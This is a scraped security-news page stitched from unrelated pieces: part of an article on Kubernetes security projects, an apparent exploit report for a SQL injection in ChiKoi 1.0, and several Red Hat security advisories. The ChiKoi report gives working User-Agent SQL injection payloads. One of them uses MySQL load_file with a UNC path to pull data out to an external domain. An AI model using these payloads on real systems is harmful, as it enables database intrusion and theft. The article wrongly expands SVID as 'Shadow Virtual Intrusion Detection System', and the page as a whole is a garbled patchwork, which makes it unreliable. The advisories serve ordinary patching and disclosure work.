The SPIFFE project is a set of open source standards for securely identifying software systems in workloads across heterogeneous environments and organizational boundaries. Secure Production Identity Framework for Everyone (SPIFFE) defines short-lived cryptographic identity documents, or Shadow Virtual Intrusion Detection System (SVIDS), that workloads can use to authenticate to other workloads. SPIFFE's partner in identity is SPIRE, the SPIFFE runtime environment. SPIRE implements the SPIFFE spec, enforcing multifactor attestation to issue identities. While there is still work to be done, the SPIFFE and SPIRE projects — both incubated by the Cloud Native Computing Foundation (CNCF) — are helping set the groundwork not only for end-to-end identity but also zero trust. 

****Sigstore****

The old adage that a chain is only as strong as its weakest link couldn't be truer than when it comes to the software supply chain. As shown by the rash of supply chain hacks we've seen in the past few years — attacks that are likely to increase as the stakes grow higher — it's increasingly important to ensure that nothing in the supply chain has been tampered with. One of the ways to do that is to sign everything — especially if you are doing everything (or even most things) as code.

Sigstore — under the auspices of the Linux Foundation — is intended to make cryptographic signing in the supply chain easier. Sigstore removes the cryptography burden from developers, enabling them to use an email address via the OpenID Connect (OIDC) protocol as a preexisting identifier to sign their code. We're seeing organizations implement Sigstore in more traditional ways, but it will be interesting to see if they adopt OIDC-based signing (through the Fulcio portion of the Sigstore project) and the Rekor signature log as a more agile way to manage signing and attestation of signatures or verification of signatures. It will also be interesting to see if Sigstore is eventually implemented not just in new products, but also within the enterprise itself.

****Kyverno and OPA Gatekeeper**

Kyverno, which provides Kubernetes-native policy management, is a project to watch because organizations are paying more attention to admission policies, particularly as the Kubernetes community moves toward pod security admission. There are only three profiles associated with Kubernetes-native pod security admission — a model that is simple by design. If you want more complexity, you need to go with something like Gatekeeper and Open Policy Agent (OPA). Some organizations find Kyverno easier to use with Kubernetes. It's YAML-based, so it doesn't require learning a new language. However, other organizations have invested in learning Rego, the language used with Open Policy Agent, as OPA is a general-purpose policy engine that can be used to automate policies throughout the stack. Indeed, there are a variety of open source policy engines available right now. The real question is whether the landscape will continue to be dotted with engines that have varying degrees of integration with Kubernetes, or if one will eventually become the de facto standard.  

**eBPF-Based Projects**

Kubernetes and the technologies it works with rely heavily on core Linux capabilities. One of these is Extended Berkeley Packet Filter(eBPF), which is increasingly used in networking, security and auditing, and tracing and monitoring tools. Importantly, when it comes to runtime security, eBPF provides observability at a deep level. You can't secure what you can't see, and eBPF provides the level of observability you need for Kubernetes and container platforms in a more consumable fashion. eBPF is being leveraged by many projects, including Falco, a Kubernetes runtime security tool, and Cilium, which provides, secures, and observes network connectivity among container workloads. The biggest indicator of which projects will rise to the top is how nicely they play with Kubernetes. For example, Cilium is interesting because it is written in Go rather than C, which makes it easier to integrate into Kubernetes.

**Kubernetes Networking Projects**

We're seeing more and more organizations deploy multiple clusters, with the resulting need for solutions that communicate or interact across clusters. Skupper is interesting because it enables organizations to create a kind of virtual application network from namespaces in one or more Kube clusters. It's a whole new approach to managing communication between clusters, negating the need for VPNs or special firewall rules. The Gateway API, which comes from the Kube SIG Network, is working to evolve and secure Kubernetes service networking to make it more extensible, with a set of APIs that push it beyond L3 to L4 and L7. Gateway API is an open source project managed by the SIG Network community.

**Conclusion**

As organizations expand their use of Kubernetes, they must constantly be vigilant about balancing performance gains with security, governance, and compliance.

Kubernetes-Related Security Projects to Watch in 2023

ChiKoi version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: ChiKoi-1.0 SQLi## Author: nu11secur1ty## Date: 01.12.2023## Vendor: https://chikoiquan.tanhongit.com/## Software: https://github.com/tanhongit/new-mvc-shop/releases/tag/v1.0## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi## Description:The `User-Agent` HTTP header appears to be vulnerable to SQL injection attacks.The payload '+(selectload_file('\\\\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.com\\quv'))+'was submitted in the User-Agent HTTP header.This payload injects a SQL sub-query that calls MySQL's load_filefunction with a UNC file path that references a URL on an externaldomain.The attacker can steal all information from this system and canseriously harm the users of this system,such as extracting bank accounts through which they pay each other, etc.## STATUS: HIGH Vulnerability - CRITICAL[+] Payload:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 2474=2474 AND9291=(SELECT (CASE WHEN (9291=9291) THEN 9291 ELSE (SELECT 4553 UNIONSELECT 6994) END))-- -    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR)    Payload: Mozilla/5.0 (Windows; U; Windows NT 6.1; hu; rv:1.9.1.9)Gecko/20100315 Firefox/3.5.9 (.NET CLR 3.5.30729)' WHERE 4578=4578 AND(SELECT 8224 FROM(SELECT COUNT(*),CONCAT(0x71706b7171,(SELECT(ELT(8224=8224,1))),0x716a6a6271,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VCWR---```[+] Online:```MySQL---Parameter: User-Agent (User-Agent)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)    Payload: Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1)Gecko/20060601 Firefox/2.0 (Ubuntu-edgy)' WHERE 8386=8386 AND8264=(SELECT (CASE WHEN (8264=8264) THEN 8264 ELSE (SELECT 2322 UNIONSELECT 6426) END))-- ----```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/tanhongit/2023/ChiKoi)## Proof and Exploit:[href](https://streamable.com/7x69yz)## Time spent`01:30:00`## Writing an exploit`00:05:00`

ChiKoi 1.0 SQL Injection

Red Hat Security Advisory 2023-0101-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security and bug fix update  
Advisory ID:       RHSA-2023:0101-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0101  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-2964 CVE-2022-4139   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 8) - aarch64, ppc64le, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: memory corruption in AX88179_178A based USB ethernet device.  
(CVE-2022-2964)

* kernel: i915: Incorrect GPU TLB flush can lead to random memory access  
(CVE-2022-4139)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* RHEL8.4 - zfcp: fix missing auto port scan and thus missing target ports  
(BZ#2127849)

* vfio zero page mappings fail after 2M instances (BZ#2128515)

* ice: Driver Update up to 5.19 (BZ#2130992)

* atlantic: missing hybernate/resume fixes (BZ#2131935)

* Bluefield 2 DPU would crash and reboot due to a kernel panic (BZ#2134084)

* Fix issue that enables STABLE_WRITES by default and causes performance  
regressions (BZ#2135813)

* ice: Intel E810 PTP clock glitching (BZ#2136036)

* ice: configure link-down-on-close on and change interface mtu to 9000,the  
interface can't up (BZ#2136216)

* ice: dump additional CSRs for Tx hang debugging (BZ#2136513)

* ice,iavf: system panic during sriov sriov_test_cntvf_reboot testing  
(BZ#2137270)

* After upgrading to ocp4.11.1, our dpdk application using vlan strip  
offload is not working (BZ#2138157)

* i40e: orphaned-leaky memory when interacting with driver memory  
parameters (BZ#2138205)

* WARNING: CPU: 0 PID: 9637 at kernel/time/hrtimer.c:1309  
hrtimer_start_range_ns+0x35d/0x400 (BZ#2138953)

* DELL EMC 8.6-RT: System is not booting into RT Kernel with perc12.  
(BZ#2139216)

* Lenovo 8.7: The VGA display shows no signal when install RHEL8.7  
(BZ#2140152)

* Host Pod -> NodePort Service traffic (Host Backend - Same Node) Flow  
Iperf Cannot Pass Traffic (BZ#2141878)

* mlx5_core: mlx5_cmd_check messages scrolling with hardware offload  
enabled (BZ#2141957)

* net/ice: VIRTCHNL_OP_CONFIG_VSI_QUEUES command handling failure with  
in-tree driver (BZ#2142017)

* RHEL:8.6+ IBM Partner issue - Loopback driver with ABORT_TASKS causing  
hangs in scsi eh, this bug was cloned for RHEL8.6 and need this patch in  
8.6+ (BZ#2144583)

* AMdCLIENT 8.8: The kernel command line parameter "nomodeset" not working  
properly (BZ#2145218)

* Path loss during Volume Ownership Change on RHEL 8.7 SAS (BZ#2147374)

* net/ice: OP_SET_RSS_HENA command not supported with in-tree driver  
(BZ#2148130)

* iavf panic: iavf 0000:ca:01.0: Failed to init adminq: -53 (BZ#2149081)

* Intel 8.8 iavf: Driver Update (bugfixes) (BZ#2149742)

* Azure RHEL-8 PCI: hv: Do not set PCI_COMMAND_MEMORY to reduce VM boot  
time (BZ#2150912)

* RHEL-8.7: System fails to boot with soft lockup while loading/unloading  
an unsigned (E) kernel module. (BZ#2152206)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2067482 - CVE-2022-2964 kernel: memory corruption in AX88179_178A based USB ethernet device.  
2147572 - CVE-2022-4139 kernel: i915: Incorrect GPU TLB flush can lead to random memory access

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kernel-4.18.0-425.10.1.el8_7.src.rpm

aarch64:  
bpftool-4.18.0-425.10.1.el8_7.aarch64.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-core-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm

noarch:  
kernel-abi-stablelists-4.18.0-425.10.1.el8_7.noarch.rpm  
kernel-doc-4.18.0-425.10.1.el8_7.noarch.rpm

ppc64le:  
bpftool-4.18.0-425.10.1.el8_7.ppc64le.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-core-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm

s390x:  
bpftool-4.18.0-425.10.1.el8_7.s390x.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-debuginfo-common-s390x-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-core-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-devel-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-modules-4.18.0-425.10.1.el8_7.s390x.rpm  
kernel-zfcpdump-modules-extra-4.18.0-425.10.1.el8_7.s390x.rpm  
perf-4.18.0-425.10.1.el8_7.s390x.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm  
python3-perf-4.18.0-425.10.1.el8_7.s390x.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.s390x.rpm

x86_64:  
bpftool-4.18.0-425.10.1.el8_7.x86_64.rpm  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-core-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-cross-headers-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-core-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-modules-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-modules-extra-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-headers-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-modules-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-modules-extra-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-libs-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm

Red Hat CodeReady Linux Builder (v. 8):

aarch64:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-debuginfo-common-aarch64-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.aarch64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.aarch64.rpm

ppc64le:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.ppc64le.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.ppc64le.rpm

x86_64:  
bpftool-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debug-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-debuginfo-common-x86_64-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
kernel-tools-libs-devel-4.18.0-425.10.1.el8_7.x86_64.rpm  
perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm  
python3-perf-debuginfo-4.18.0-425.10.1.el8_7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2964  
https://access.redhat.com/security/cve/CVE-2022-4139  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i69zjgjWX9erEAQi7og/+NmgRZHeaRAFdkzMYD9KOIoU1RNAlKAfu  
hJf63p0zW4JqRUcn7p+v3qFw84eBJR4Q+dWsx9I8IBKoZ+jZQQlvMOy17eXPnedD  
et7KieOv6+4YXYh9QDD6LzqXjrhdZCFVTbd2Yjhnsvll74o/r4T8at+MGZmAEbsc  
9vWDOyknBmusOnk1GcKKgvrOGfpw/WHKsn/O+iZAT3o1kEHxQoUF689rYGn/Nm56  
i+53s/QlbvXTAmiyMjMWTfM7fR899BRfYfEy0GCrFT7NOcXZ14DwZ4bgLXqeFaHv  
pIVDryqShKr6qUsp0Whb8y6RcqZebL57mCDmnGhrCn3O4n9RMtjn3ApDks9urp0t  
wmrO/TuejHqM9Agjyz2SZSJf23nJSoCxfssHkRPbd/NxPVv2a05iOe/GPrMdmA1D  
bLUKyIeAy8gxNzxIqrH/MmTlyddUVgy/3Oi15etSSRYxG3zPQYAIB3yxdVKxOS4K  
YJhZzL5OMQilO/dP3zYrGSjJkA5CTYU0laMs8QPDpBiKUJU8q/r7XRj6PS6THCOZ  
Xjpf66XYbT42v6Ly3lIvM+w6TZpy2NzxFBfq8Ab8J+ssUYzEpxlD7voZ0ca9rbzv  
V4SVdHzEpMITwqkW1OPjKMWYlFFkMn7RcgzU1jgxTTwN3y1IIJSVCU67NP4K+re7  
Vh1Z7+eM4CY=  
=B1Qw  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0101-01

Red Hat Security Advisory 2023-0103-01 - Expat is a C library for parsing XML documents. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: expat security update  
Advisory ID:       RHSA-2023:0103-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0103  
Issue date:        2023-01-12  
CVE Names:         CVE-2022-43680   
=====================================================================

1. Summary:

An update for expat is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives  
a detailed severity rating, is available for each vulnerability from the  
CVE  
link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

Expat is a C library for parsing XML documents.

Security Fix(es):

* expat: use-after free caused by overeager destruction of a shared DTD in  
XML_ExternalEntityParserCreate (CVE-2022-43680)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s)  
listed in the References section.

4. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.

For details on how to apply this update, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2140059 - CVE-2022-43680 expat: use-after free caused by overeager destruction of a shared DTD in XML_ExternalEntityParserCreate

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
expat-2.2.5-10.el8_7.1.src.rpm

aarch64:  
expat-2.2.5-10.el8_7.1.aarch64.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.aarch64.rpm  
expat-debugsource-2.2.5-10.el8_7.1.aarch64.rpm  
expat-devel-2.2.5-10.el8_7.1.aarch64.rpm

ppc64le:  
expat-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-debugsource-2.2.5-10.el8_7.1.ppc64le.rpm  
expat-devel-2.2.5-10.el8_7.1.ppc64le.rpm

s390x:  
expat-2.2.5-10.el8_7.1.s390x.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.s390x.rpm  
expat-debugsource-2.2.5-10.el8_7.1.s390x.rpm  
expat-devel-2.2.5-10.el8_7.1.s390x.rpm

x86_64:  
expat-2.2.5-10.el8_7.1.i686.rpm  
expat-2.2.5-10.el8_7.1.x86_64.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.i686.rpm  
expat-debuginfo-2.2.5-10.el8_7.1.x86_64.rpm  
expat-debugsource-2.2.5-10.el8_7.1.i686.rpm  
expat-debugsource-2.2.5-10.el8_7.1.x86_64.rpm  
expat-devel-2.2.5-10.el8_7.1.i686.rpm  
expat-devel-2.2.5-10.el8_7.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-43680  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7/i5tzjgjWX9erEAQgotw/7BCtmV6eYMcGDayo+BGOodho987OHD/Sq  
obdHtIuMbhVwA53WG78sijk86V4SMV7IJtOvBgP4HFB6syAyhy50yvLAiw+NYghb  
i0kZ1sokrJVfG9ztrp+ToL5HDkR/s7MDOrhRhP3AHqmiE26o1//W9SOa2XMyN0kU  
jhd949cSVPhS+ztVOU02Yf/gPWqg0lW9Cn1B2T/auXzYFMBeVh2JqmklssXRV6T0  
rPWxtjO4frmm2WDkBcSiwRRD8MH51xm9yxGkwJnvAVcZtpNBU9Hz51asJnGSU/Zn  
OUyIAY91b1JTT9C8omohqY3UVEEAZuq4gDwsQZbLl8nZzkyposKb7DAt1Z319kWa  
cBC6SrSKBW/kx5YIv/FTJoHQLfm5vZxxhVuIBZyB5g9dJr/F2kmuyp3URx1eo42q  
CbQl3LH9BX7IIBzFsCKmnwrcVdUyl61AHdcx2lL71fUSAnjd0FQ0yKN0qKAatQDx  
nuhnLqsAmcHa2yjRb1HXGB9ah5Wi2Wyk6cmpHqoHF/c4jGnCItyQ3STWnWwLrjlU  
eDdWmHEOK0qBjjguaLfc2c3qqUBHqc8hItD300DqizV6dX11hNSPexibwrusZXgk  
gDRd3jRu7bvPJ12Jds/fsnTQ43UtFlNhRj00mTaXdEMOvGWzEH1VEI3Xw97+7FyZ  
vemkyDANWfU=  
=YQE9  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0103-01

An update for rh-postgresql10-postgresql is now available for Red Hat Software Collections.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-2625: postgresql: Extension scripts replace objects not belonging to the extension.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2023-01-12

Updated:

2023-01-12

**RHSA-2023:0160 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Moderate: rh-postgresql10-postgresql security and bug fix update

**Type/Severity**

Security Advisory: Moderate

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for rh-postgresql10-postgresql is now available for Red Hat Software Collections.  

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

PostgreSQL is an advanced object-relational database management system (DBMS).  

The following packages have been upgraded to a later upstream version:  
rh-postgresql10-postgresql (10.23).  

Security Fix(es):  

*   postgresql: Extension scripts replace objects not belonging to the extension. (CVE-2022-2625)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  

Bug Fix(es):  

*   rh-postgresql10-postgresql: Update to the latest PostgreSQL version 10.23 (BZ#2157611)

**Solution**

For details on how to apply this update, which includes the changes described in this advisory, refer to:  

https://access.redhat.com/articles/11258

If the postgresql service is running, it will be automatically restarted after installing this update.

**Affected Products**

*   Red Hat Software Collections (for RHEL Server) 1 for RHEL 7 x86\_64
*   Red Hat Software Collections (for RHEL Server for System Z) 1 for RHEL 7 s390x
*   Red Hat Software Collections (for RHEL Server for IBM Power LE) 1 for RHEL 7 ppc64le
*   Red Hat Software Collections (for RHEL Workstation) 1 for RHEL 7 x86\_64

**Fixes**

